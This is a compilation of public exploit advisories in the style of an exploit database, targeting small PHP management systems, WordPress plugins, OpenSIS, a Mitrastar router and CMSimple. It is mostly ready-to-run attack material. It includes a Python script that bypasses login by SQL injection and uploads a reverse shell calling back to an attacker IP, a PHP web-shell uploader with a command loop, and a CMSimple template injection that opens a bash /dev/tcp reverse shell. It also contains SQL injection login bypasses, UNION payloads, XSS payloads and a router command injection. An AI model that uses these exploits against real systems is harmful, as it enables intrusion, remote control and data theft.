# Exploit Title: Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 28.09.2021 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https://www.sourcecodester.com/php/14932/storage-unit-rental-management-system-using-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14932&title=Storage+Unit+Rental+Management+System+using+PHP+Free+Source+Code # Version: 1 # Tested on: Ubuntu import requests from bs4 import BeautifulSoup import sys import random import string import time if len(sys.argv) != 4: print("[~] Usage : python3 exploit.py localhost ip port") exit() site = sys.argv[1] ip = sys.argv[2] port = sys.argv[3] shellcode = "<?php $sock=fsockopen('" +ip+"',"+port+");exec('/bin/sh -i <&3 >&3 2>&3'); ?>" letters = string.ascii_lowercase name = ''.join(random.choice(letters) for i in range(5)) def LoginAndShellUpload(): login = 'http://'+site+':80/storage/classes/Login.php?f=login' session = requests.session() post_data = {"username": "' OR 1=1-- -", "password": "aa"} user_login = session.post(login, data=post_data) cookie = session.cookies.get_dict() print('[+]Success login') print('[+]Try Shell upload') time.sleep(2) #shell upload url = 'http://'+site+':80/storage/classes/SystemSettings.php?f=update_settings' cookies = cookie headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------246884504016047375913085888751", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/storage/admin/?page=system_info", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} data = "-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nStorage Unit Rental Management System - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nSURMS - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"cover\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------246884504016047375913085888751--\r\n" requests.post(url, headers=headers, cookies=cookies, data=data) print('[+]Success!') print('[+]Getting reverse shell') time.sleep(2) def RCE(): path = 'http://'+site+'/storage/uploads/' html_text = requests.get(path).text soup = BeautifulSoup(html_text, 'html.parser') for link in soup.find_all('a'): data = link.get('href') with open('shell_location.txt', 'w') as f: f.write(data) path2 = 'shell_location.txt' shell_file = open(path2,'r') shell = shell_file.readline() r = requests.get('http://'+site+'/storage/uploads/'+shell) print(r.text) print('[+]Hacked!') LoginAndShellUpload() RCE()

# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS) # Date: 2/3/2021 # Author: 0xB9 # Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip # Version: 1.3.0 # Tested on: Windows 10 # CVE: CVE-2021-24286 1. Description: This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS. 2. Proof of Concept: wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);

# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS) # Date: 2/15/2021 # Author: 0xB9 # Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip # Version: 1.3.1 # Tested on: Windows 10 # CVE: CVE-2021-24287 1. Description: The tab parameter in the Admin Panel is vulnerable to XSS. 2. Proof of Concept: wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);

# Exploit Title: Mitrastar GPT-2541GNAC-N1 - Privilege escalation # Date: 10-08-2021 # Exploit Author: Leonardo Nicolas Servalli # Vendor Homepage: www.mitrastar.com # Platform: Mistrastar router devices GPT-2541GNAC-N1 (HGU) # Tested on: Firmware BR_g3.5_100VNZ0b33 # Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-MitraStar/blob/main/README.md Description: ---------- # Mitrastar GPT-2541GNAC-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials). # The command “deviceinfo show file <path>” is used from reduced CLI to show files and directories. Because this command do not handle correctly special characters, is possible to insert a second command as a parameter on the <path> value. By using “&&/bin/bash” as parameter value we can spawn a bash console, as seen on the next example: Exploit: -------- > deviceinfo show file &&/bin/bash # This command will spawn a full interoperable bash console with root privileges.

# Exploit Title: OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS) # Date: 9/24/2021 # Exploit Author: Eric Salario # Vendor Homepage: http://www.os4ed.com/ # Software Link: https://opensis.com/download # Version: 8.0 # Tested on: Windows, Linux # CVE : CVE-2021-40310 OpenSIS Community Edition version 8.0 is affected by a cross-site scripting (XSS) vulnerability in the TakeAttendance.php via the cp_id_miss_attn parameter. 1. Login as "teacher". 2. Navigate to (take attendance): http://demo.opensis.com/ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true Decoded request: GET /ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7 onmouseover=alert(document.domain) style=position:absolute;width:100%;height:100%;top:0;left:0; z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true HTTP/1.1 3. XSS triggers PoC Video: https://www.youtube.com/watch?v=aPKPUDmmYpc

# Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 28.09.2021 # Author: Mr.Gedik # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html # Version: 1.0 # https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB Vulnerable code controllers/add_petmanagement.php Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"], $_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" . addslashes($_FILES["images"]["name"])); Exploit ############# <?php /* @author:mrgedik */ function anim($msg, $time) { $msg = str_split($msg); foreach ($msg as $ms) { echo $ms; usleep($time); } } anim("__ __ _____ _ _ _ | \/ | / ____| | (_) | | \ / |_ __| | __ ___ __| |_| | __ | |\/| | '__| | |_ |/ _ \/ _` | | |/ / | | | | |_ | |__| | __/ (_| | | < |_| |_|_(_) \_____|\___|\__,_|_|_|\_\ ", 900); echo PHP_EOL; while(1) { echo anim("Target (http://example.com/path/): ", 800); $target = trim(fgets(STDIN)); echo PHP_EOL; if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) { echo "Not a valid URL".PHP_EOL; }else { break; } } @unlink("exp.php"); $fw = fopen("exp.php","a+"); fwrite($fw,'<?php $_POST[m]($_POST[g]); ?>'); fclose($fw); $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php"); $fields = [ 'images' => new \CurlFile("exp.php", 'image/png', 'exp.php') ]; curl_setopt($ch, CURLOPT_POSTFIELDS, $fields); $response = curl_exec($ch); @unlink("exp.php"); if(strstr($response,"success")) { while(1) { echo anim("root@pwn: ", 800); $command = trim(fgets(STDIN)); if($command == trim("exit")) { exit; } $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); echo curl_exec($ch); curl_close ($ch); } }else { echo anim("Fail", 800); } ?>

# Exploit Title: Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass # Date: 29-09-2021 # Exploit Author: sudoninja # Vendor Homepage: https://phpgurukul.com # Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ # Version: 1.0 # Tested on: XAMPP / Windows 10 Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/ccms/index.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step4 – Change the username to ' OR 1 -- - and password to ccms Step 5 – Click forward and now you will be logged in as admin. POC POST /ccms/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/ccms/ Cookie: PHPSESSID=agarg3okitkr3g8dbi5icnq8du Upgrade-Insecure-Requests: 1 username='%20OR%201%20--%20-&password=ccms&login=

# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi) # Date: 28.09.2021 # Exploit Author: Murat # Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip # Version: 1.0 # Tested on: Windows 10 # Pharmacy Point of Sale System v1.0 SQLi GET /pharmacy/view_product.php?id=-1 HTTP/1.1 Host: localhost Cookie: PHPSESSID=5smfl8sfgemi1h9kdl2h3dsnd6 Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Connection: close POC: https://localhost/pharmacy/view_product.php?id=2000110022%27+union+select+1%2c1%2c1%2c1%2c%28select%27SqLi%27%7c%7csubstr%28%28select+sqlite%5fversion%28%29%7c%7c%27%04%27%7c%7c%27sqlite%5fmaster%27%7c%7c%27%04%27%7c%7c%27anonymous%27%7c%7c%27%01%03%03%07%27%29%2c1%2c65536%29%29%2c1%2c1%2c1-- ----------------------------------------------------------------------- #Other parameters with sql injection vulnerability; ==> /pharmacy/?date_from=&date_to=1'"&page=sales_report ==> /pharmacy/?date_from=1'"&date_to=&page=sales_report ==> /pharmacy/manage_stock.php?expiry_date=01/01/1967&id=-1'&product_id=1&quantity=1&supplier_id=1 ==> GET /pharmacy/view_receipt.php?id=1'"&view_only=true ==> /pharmacy/manage_product.php?id=-1' ==> POST /pharmacy/Actions.php?a=save_stock ------------YWJkMTQzNDcw Content-Disposition: form-data; name="id" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="supplier_id" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="product_id" 2'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="quantity" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="expiry_date" ==> POST /pharmacy/Actions.php?a=save_product HTTP/1.1 ------------YWJkMTQzNDcw Content-Disposition: form-data; name="id" 5'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="product_code" 94102'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="category_id" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="name" pHqghUme'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="price" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="description" 1'" ------------YWJkMTQzNDcw Content-Disposition: form-data; name="status" 0'" ------------YWJkMTQzNDcw-- -

# Exploit Title: Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated) # Date: 29.09.2021 # Exploit Author: pussycat0x # Vendor Homepage: https://www.cmsimple.org/ # Version: 5.4 # Tested on: ubuntu-20.04.1 import argparse from bs4 import BeautifulSoup from argparse import ArgumentParser import requests parser= ArgumentParser(description="cmsimple ", epilog='cmsimpleRCE.py -url targetdomai.com -u username -p password -ip lhost -lp lport') rparser = parser.add_argument_group('required argument') rparser.add_argument('-url','--host', type=str, help='target domain',required=True) rparser.add_argument('-u' ,'--username', type=str, help='', required=True) rparser.add_argument('-p','--password',type=str,help='', required=True) rparser.add_argument('-ip','--lhost',type=str,help='listener ip', required=True) rparser.add_argument('-lp','--lport', type=str,help='listener port', required=True) args= parser.parse_args() #url ='192.168.1.106' s = requests.Session() def main(): try: url =(args.host) payload = { 'user':args.username, 'passwd':args.password, 'submit': 'Login', 'login':'true', } login=s.post(url +'/?Welcome_to_CMSimple_5',data=payload) if login.status_code == 200: print('Exploit Completed') else: print("Invalid Credential") cook =(login.cookies.get_dict()) temp = s.get(url +'/?file=template&action=edit', cookies=cook) soup = BeautifulSoup(temp.text, 'lxml') csrfToken = soup.find('input',attrs = {'name':'csrf_token'})['value'] #<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); rev = """<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/""" rev2=(args.lhost) rev3=(args.lport) rev4=""" 0>&1'");""" php =(rev+rev2+'/'+rev3+rev4) revpayload = { 'cmsimpleDataFileStored':'cmsimpleDataFileStored', 'csrf_token':csrfToken, 'text':php, 'file':'template', 'action':'save', } shell = s.post(url +'/',cookies=cook , data=revpayload) exec = s.get(url+'/') exit() except: pass main()

# Exploit Title: Blood Bank System 1.0 - Authentication Bypass # Date: 30-9-2021 # Exploit Author: Nitin Sharma (vidvansh) # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code/ # Software Link : https://download.code-projects.org/details/f44a4ba9-bc33-48c3-b030-02f62117d230 # Version: 1.0 # Tested on: Windows 10 , Apache , Mysql # Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts. #Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/bloodbank/login.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -. Step 5 – Click forward and now you will be logged in as admin. # PoC: GET /bloodbank/file/../bloodrequest.php?msg=Gandhi%20hospital%20have%20logged%20in. HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://localhost Connection: close Referer: http://localhost/bloodbank/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 # Authentication Bypass: # Go to admin login page (http://localhost/bloodbank/login.php), then use below payload as username and password => Username: ** Random email** Password: ' or 1 -- -

# Exploit Title: Exam Form Submission System 1.0 - SQL Injection Authentication Bypass # Date: 30-09-2021 # Exploit Author: Nitin Sharma (Vidvansh) # Vendor Homepage: https://code-projects.org # Product link: https://code-projects.org/exam-form-submission-in-php-with-source-code/ # Version: 1.0 # Tested on: XAMPP / Windows 10 Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/EXAM_FORM_SUBMISSION/admin/index.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -. Step 5 – Click forward and now you will be logged in as admin. POC POST /EXAM_FORM_SUBMISSION/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 40 Origin: http://localhost Connection: close Referer: http://localhost/EXAM_FORM_SUBMISSION/admin/index.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 email='%20OR%201%20--%20-&pass='%20OR%201%20--%20-&Login=Login